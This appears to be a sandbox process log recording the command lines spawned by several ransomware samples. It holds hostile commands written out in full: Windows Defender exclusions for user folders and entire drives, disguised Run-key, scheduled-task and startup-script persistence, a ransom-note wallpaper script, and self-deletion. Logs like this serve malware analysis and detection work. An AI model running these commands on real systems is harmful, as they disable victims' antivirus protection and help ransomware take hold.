C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fbf8b45d1697677f1f3e080552bfc66e9db36d03f28b22cf7156f0cb156e71ff.exe

HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fbf8b45d1697677f1f3e080552bfc66e9db36d03f28b22cf7156f0cb156e71ff.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Cryptor.gen-5b7bed7349f6b1499b7eac111d7264101b13eeb9684830a4a93bab5f9d79d77e.exe

HEUR-Trojan-Ransom.Win32.Cryptor.gen-5b7bed7349f6b1499b7eac111d7264101b13eeb9684830a4a93bab5f9d79d77e.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00484\uninstall.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\Run /V "svchosted" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\svchosted

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\696116166.png /f

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Encoder.gen-b3ce84f48b34e821f18bfc828eb8da378d2531f7cc2bb16db82e11bead446b11.exe"

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe

HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe

C:\Users\Admin\AppData\Local\Temp\svchost32.exe

C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Encoder.gen-b3ce84f48b34e821f18bfc828eb8da378d2531f7cc2bb16db82e11bead446b11.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-ef8045de414c6a1ebbdc6ba03f14e832be975d14e6295d1c0c884768e8f53cdb.exe

HEUR-Trojan-Ransom.Win32.GandCrypt.pef-ef8045de414c6a1ebbdc6ba03f14e832be975d14e6295d1c0c884768e8f53cdb.exe

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Links

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Contacts

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Music

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\OneDrive

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Favorites

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Searches

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Videos

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "D:\

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "E:\

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "F:\

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "G:\

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "H:\

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "Z:\

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Generic-3c0360acd0ce74cb44b8fb9bd2c8fcfac81a980ae108b2477d5fbdc17786cbc7.exe

HEUR-Trojan-Ransom.Win32.Generic-3c0360acd0ce74cb44b8fb9bd2c8fcfac81a980ae108b2477d5fbdc17786cbc7.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5864 -ip 5864

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5864 -s 380

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Generic-e7974f558f498367cb1209f37181411662e83f5f522d8e7b48297361bf29506a.exe

HEUR-Trojan-Ransom.Win32.Generic-e7974f558f498367cb1209f37181411662e83f5f522d8e7b48297361bf29506a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe",1: >"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "C:\

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5e6b3680047317ceea85b42cdf508204319b55fe183e42e86847efbd09f5ca80.exe

HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5e6b3680047317ceea85b42cdf508204319b55fe183e42e86847efbd09f5ca80.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Stop.gen-c9cf26ceba119e99260cc610f71d5a8a25333442523e85f9cc0ff3ce293e117c.exe

HEUR-Trojan-Ransom.Win32.Stop.gen-c9cf26ceba119e99260cc610f71d5a8a25333442523e85f9cc0ff3ce293e117c.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Searches

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Contacts

C:\Windows\system32\services32.exe

"C:\Windows\system32\services32.exe"

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Favorites

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Music

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "D:\

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Videos

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "G:\

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "H:\

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Links

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "E:\

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "F:\

C:\Users\Admin\AppData\Local\Temp\RarSFX0\sevnz.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\sevnz.exe"

C:\Windows\system32\cmd.exe

"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "Z:\

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\OneDrive

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan.MSIL.Crypt.gen-3d488dc7b6df72e08d341b66a2d872880e64c97dcb64938733328047b78b556a.exe

HEUR-Trojan.MSIL.Crypt.gen-3d488dc7b6df72e08d341b66a2d872880e64c97dcb64938733328047b78b556a.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\RarSFX0\sevnz.exe" "C:\Users\Admin\AppData\Roaming\sevnz.exe"

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan.MSIL.Crypt.gen-985341027d53e6f9403861d917a3117c7a78dd8a6e13b7cded5537d19ce0cf7a.exe

HEUR-Trojan.MSIL.Crypt.gen-985341027d53e6f9403861d917a3117c7a78dd8a6e13b7cded5537d19ce0cf7a.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

